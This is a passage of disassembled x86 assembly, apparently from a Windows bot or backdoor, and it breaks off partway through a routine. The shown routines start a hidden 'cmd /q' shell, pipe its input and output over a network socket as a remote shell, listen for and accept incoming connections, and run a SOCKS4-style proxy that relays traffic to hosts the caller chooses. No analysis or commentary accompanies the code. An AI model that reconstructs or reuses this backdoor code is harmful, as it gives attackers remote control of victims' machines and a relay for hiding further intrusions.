call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415C3F
push edi ; int
lea eax, [ebp+Source]
push 9 ; int
push eax ; Source
call sub_40B756
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov dword_45601C[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_411240
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov dword_45602C[ecx], eax
jz short loc_4116C2
loc_4116AF: ; CODE XREF: sub_4114CE+1F2�j
cmp [ebp+var_38], esi
jnz loc_4115EF
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4116AF
; ---------------------------------------------------------------------------
loc_4116C2: ; CODE XREF: sub_4114CE+1DF�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B328 ; "-"
call sub_415CB3
pop ecx
pop ecx
jmp short loc_4116DA
; ---------------------------------------------------------------------------
loc_4116D7: ; CODE XREF: sub_4114CE+C8�j
; sub_4114CE+EC�j ...
mov edi, [ebp+arg_0]
loc_4116DA: ; CODE XREF: sub_4114CE+13C�j
; sub_4114CE+207�j
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Source]
push offset asc_44B364 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_41171A
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_40] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409D34
add esp, 14h
loc_41171A: ; CODE XREF: sub_4114CE+22A�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
pop ecx
push edi
call dword_4E3190 ; closesocket
push ebx
call dword_4E3190 ; closesocket
call dword_4E3050 ; WSACleanup
push [ebp+var_4C]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop ebx
loc_41174C: ; DATA XREF: sub_4114CE+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_4114CE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411756 proc near ; CODE XREF: sub_411240+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_4118A7
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, dword_456024[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_4F5350
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411A79
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_4117C1
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B39C ; "-"
call sub_415CB3
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_4117FB
; ---------------------------------------------------------------------------
loc_4117C1: ; CODE XREF: sub_411756+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411B2B
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_411802
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B3E4 ; "-"
call sub_415CB3
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4F5380 ; TerminateThread
loc_4117FB: ; CODE XREF: sub_411756+69�j
xor eax, eax
jmp loc_4118A2
; ---------------------------------------------------------------------------
loc_411802: ; CODE XREF: sub_411756+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_4F53FC ; WaitForMultipleObjects
sub eax, ebx
jz short loc_41185C
dec eax
jz short loc_411856
dec eax
jz short loc_411842
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B42C ; "-"
call sub_415CB3
pop ecx
pop ecx
jmp short loc_411871
; ---------------------------------------------------------------------------
loc_411842: ; CODE XREF: sub_411756+D5�j
mov edi, ds:dword_4F5380
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_411871
; ---------------------------------------------------------------------------
loc_411856: ; CODE XREF: sub_411756+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_411860
; ---------------------------------------------------------------------------
loc_41185C: ; CODE XREF: sub_411756+CF�j
push ebx
push dword ptr [esi+14h]
loc_411860: ; CODE XREF: sub_411756+104�j
call ds:dword_4F5380 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_4F53C4 ; TerminateProcess
loc_411871: ; CODE XREF: sub_411756+EA�j
; sub_411756+FE�j
push dword ptr [esi+10h]
mov edi, ds:dword_4F533C
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_4E3190 ; closesocket
push esi ; Memory
call _free
pop ecx
push 1
pop eax
loc_4118A2: ; CODE XREF: sub_411756+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_411756 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118A7 proc near ; CODE XREF: sub_411756+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h ; Size
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call _malloc
mov esi, eax
pop ecx
cmp esi, edi
jz loc_411991
mov ebx, ds:dword_4F53D0
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:dword_4F533C
test eax, eax
jnz short loc_41190A
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B460
jmp short loc_41192A
; ---------------------------------------------------------------------------
loc_41190A: ; CODE XREF: sub_4118A7+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_411932
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B4A0 ; "-"
loc_41192A: ; CODE XREF: sub_4118A7+61�j
call sub_415CB3
pop ecx
jmp short loc_411960
; ---------------------------------------------------------------------------
loc_411932: ; CODE XREF: sub_4118A7+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_4119A0
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_411995
push offset unk_44B4E0
call sub_415C3F
loc_411960: ; CODE XREF: sub_4118A7+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_41196C
push [ebp+var_4]
call edi ; CloseHandle
loc_41196C: ; CODE XREF: sub_4118A7+BE�j
cmp [ebp+var_8], 0
jz short loc_411977
push [ebp+var_8]
call edi ; CloseHandle
loc_411977: ; CODE XREF: sub_4118A7+C9�j
mov eax, [esi]
test eax, eax
jz short loc_411980
push eax
call edi ; CloseHandle
loc_411980: ; CODE XREF: sub_4118A7+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_41198A
push eax
call edi ; CloseHandle
loc_41198A: ; CODE XREF: sub_4118A7+DE�j
push esi ; Memory
call _free
pop ecx
loc_411991: ; CODE XREF: sub_4118A7+1D�j
xor eax, eax
jmp short loc_41199B
; ---------------------------------------------------------------------------
loc_411995: ; CODE XREF: sub_4118A7+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_41199B: ; CODE XREF: sub_4118A7+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_4118A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4119A0 proc near ; CODE XREF: sub_4118A7+94�p
Dst = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_4], esi
call _memset
push 10h ; Size
lea eax, [ebp+var_14]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+Dst], edi
mov edi, ds:dword_4F53CC
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_4F53C8 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+Dst]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jz short loc_411A5C
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_456020[eax], ecx
call ds:dword_4F533C ; CloseHandle
jmp short loc_411A72
; ---------------------------------------------------------------------------
loc_411A5C: ; CODE XREF: sub_4119A0+9A�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B510 ; "-"
call sub_415CB3
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_411A72: ; CODE XREF: sub_4119A0+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_4119A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A79 proc near ; DATA XREF: sub_411756+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:dword_4F53BC
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_411AA2: ; CODE XREF: sub_411A79+8F�j
call ebx ; ReadFile
test eax, eax
jz short loc_411B0A
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_411ADD
loc_411AB3: ; CODE XREF: sub_411A79+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_411ACD
cmp dl, 0Dh
jz short loc_411ACD
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_411ACD: ; CODE XREF: sub_411A79+44�j
; sub_411A79+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_411AB3
loc_411ADD: ; CODE XREF: sub_411A79+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_4E3148 ; send
test eax, eax
jle short loc_411B0A
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_411AA2
; ---------------------------------------------------------------------------
loc_411B0A: ; CODE XREF: sub_411A79+2D�j
; sub_411A79+79�j
mov esi, ds:dword_4F5360
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_411B26
call esi ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44B548 ; "-"
call sub_415CB3
pop ecx
pop ecx
loc_411B26: ; CODE XREF: sub_411A79+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_411A79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411B2B proc near ; DATA XREF: sub_411756+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_411B44: ; CODE XREF: sub_411B2B+39�j
; sub_411B2B+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call dword_4E3110 ; recv
test eax, eax
jle loc_411C49
cmp [ebp+var_10], ebx
jbe short loc_411B66
dec [ebp+var_10]
jmp short loc_411B44
; ---------------------------------------------------------------------------
loc_411B66: ; CODE XREF: sub_411B2B+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_411C29
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_411BD6
cmp al, 7Fh
jz short loc_411BD6
cmp al, 3
jnz short loc_411B91
push ebx
push ebx
call ds:dword_4F5400 ; GenerateConsoleCtrlEvent
jmp short loc_411BFD
; ---------------------------------------------------------------------------
loc_411B91: ; CODE XREF: sub_411B2B+5A�j
cmp al, 15h
jnz short loc_411BB3
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_411BE9
; ---------------------------------------------------------------------------
loc_411BB3: ; CODE XREF: sub_411B2B+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_411BEA
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_411BE9
; ---------------------------------------------------------------------------
loc_411BD6: ; CODE XREF: sub_411B2B+52�j
; sub_411B2B+56�j
cmp esi, ebx
jbe short loc_411C00
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_411BE9: ; CODE XREF: sub_411B2B+86�j
; sub_411B2B+A9�j
pop ecx
loc_411BEA: ; CODE XREF: sub_411B2B+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call dword_4E3148 ; send
test eax, eax
jle short loc_411C49
loc_411BFD: ; CODE XREF: sub_411B2B+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_411C00: ; CODE XREF: sub_411B2B+AD�j
cmp al, 0Dh
jnz loc_411B44
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jz short loc_411C49
xor esi, esi
jmp loc_411B44
; ---------------------------------------------------------------------------
loc_411C29: ; CODE XREF: sub_411B2B+47�j
cmp [ebp+var_C], ebx
jnz short loc_411C3A
mov [ebp+var_C], 1
jmp loc_411B44
; ---------------------------------------------------------------------------
loc_411C3A: ; CODE XREF: sub_411B2B+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_411B44
; ---------------------------------------------------------------------------
loc_411C49: ; CODE XREF: sub_411B2B+2B�j
; sub_411B2B+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_411B2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411C4E proc near ; DATA XREF: sub_401CC7+2BF8�o
Source = byte ptr -2D4h
var_D4 = dword ptr -0D4h
Str = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_40]
call dword_4E30F8 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call dword_4E3178 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_456024[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E3124 ; bind
test eax, eax
jnz loc_411DF0
push 0Ah
push edi
call dword_4E3120 ; listen
test eax, eax
jnz loc_411DF0
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+Source]
push offset asc_44B584 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_411D29
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_D4] ; int
call sub_409D34
add esp, 14h
loc_411D29: ; CODE XREF: sub_411C4E+B9�j
; sub_411C4E+172�j ...
lea eax, [ebp+Source]
push eax
call sub_415C3F
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_4E318C ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_44B5AC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 19h ; int
push eax ; Source
call sub_40B756
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_45601C[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_411E53
push esi
push esi
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_45602C[ecx], eax
jz short loc_411DD0
loc_411DBD: ; CODE XREF: sub_411C4E+180�j
cmp [ebp+var_28], esi
jnz loc_411D29
push 5
call ds:dword_4F534C ; Sleep
jmp short loc_411DBD
; ---------------------------------------------------------------------------
loc_411DD0: ; CODE XREF: sub_411C4E+16D�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_44B5F0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_411D29
; ---------------------------------------------------------------------------
loc_411DF0: ; CODE XREF: sub_411C4E+7B�j
; sub_411C4E+8C�j
push edi
call dword_4E3190 ; closesocket
push [ebp+var_40]
lea eax, [ebp+Source]
push offset asc_44B62C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_411E33
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_D4] ; int
call sub_409D34
add esp, 14h
loc_411E33: ; CODE XREF: sub_411C4E+1C3�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
push [ebp+var_3C]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_411C4E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411E53 proc near ; DATA XREF: sub_411C4E+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
Dst = byte ptr -4C8h
var_C8 = byte ptr -0C8h
Str2 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_456024[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call dword_4E30E0 ; select
test eax, eax
jnz short loc_411ED4
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411ED4: ; CODE XREF: sub_411E53+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call dword_4E3110 ; recv
test eax, eax
jg short loc_411F05
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411F05: ; CODE XREF: sub_411E53+98�j
cmp [ebp+var_4D0], 4
jnz loc_4120FF
cmp [ebp+var_4CF], 1
jnz loc_4120FF
cmp [ebp+Str2], bl
jz short loc_411F9B
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Dst]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_411F9B
lea eax, [ebp+Str2]
push eax
lea eax, [ebp+Dst]
push eax ; Args
push offset dword_44B660 ; Format
call sub_415CB3
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call _memset
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4E3148 ; send
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_411F9B: ; CODE XREF: sub_411E53+CF�j
; sub_411E53+E5�j
push 10h ; Size
lea eax, [ebp+var_18]
push ebx ; Val
push eax ; Dst
call _memset
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_4E3178 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_412033
call dword_4E308C ; WSAGetLastError
push eax ; Args
push offset dword_44B6A0 ; Format
call sub_415CB3
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call _memset
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4E3148 ; send
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_412033: ; CODE XREF: sub_411E53+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_4E30A0 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4120A2
call dword_4E308C ; WSAGetLastError
push eax ; Args
push offset dword_44B6E0 ; Format
call sub_415CB3
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call _memset
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4E3148 ; send
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4120A2: ; CODE XREF: sub_411E53+1F0�j
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call _memset
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4E3148 ; send
push dword ptr [esi]
push edi
call sub_412117
pop ecx
pop ecx
push edi
call dword_4E3190 ; closesocket
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4120FF: ; CODE XREF: sub_411E53+B9�j
; sub_411E53+C6�j
push dword ptr [esi]
call dword_4E3190 ; closesocket
push [ebp+arg_0]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_411E53 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412117 proc near ; CODE XREF: sub_411E53+286�p
Dst = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_41212D: ; CODE XREF: sub_412117+C5�j
; sub_412117+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_412145: ; CODE XREF: sub_412117+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_412155
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_412145
loc_412155: ; CODE XREF: sub_412117+33�j
cmp ecx, 1
jnz short loc_41216A
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_41216A: ; CODE XREF: sub_412117+41�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_4E30E0 ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_4E2FE4 ; __WSAFDIsSet
test eax, eax
jz short loc_4121CA
push edi
lea eax, [ebp+Dst]
push esi
push eax
push ebx
call dword_4E3110 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_412212
push edi
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jz short loc_412212
loc_4121CA: ; CODE XREF: sub_412117+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_4E2FE4 ; __WSAFDIsSet
test eax, eax
jz loc_41212D
push edi
lea eax, [ebp+Dst]
push esi
push eax
push [ebp+arg_0]
call dword_4E3110 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_412212
push edi
push eax
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jnz loc_41212D
loc_412212: ; CODE XREF: sub_412117+9A�j
; sub_412117+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_412117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412217 proc near ; CODE XREF: sub_412217:loc_412688�p
; DATA XREF: sub_401CC7+20FE�o ...
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_778 = dword ptr -778h
var_578 = byte ptr -578h
var_577 = byte ptr -577h
var_576 = byte ptr -576h
var_575 = byte ptr -575h
DstBuf = byte ptr -574h
var_374 = dword ptr -374h
Filename = byte ptr -370h
Str = byte ptr -26Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = byte ptr -15Ch
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
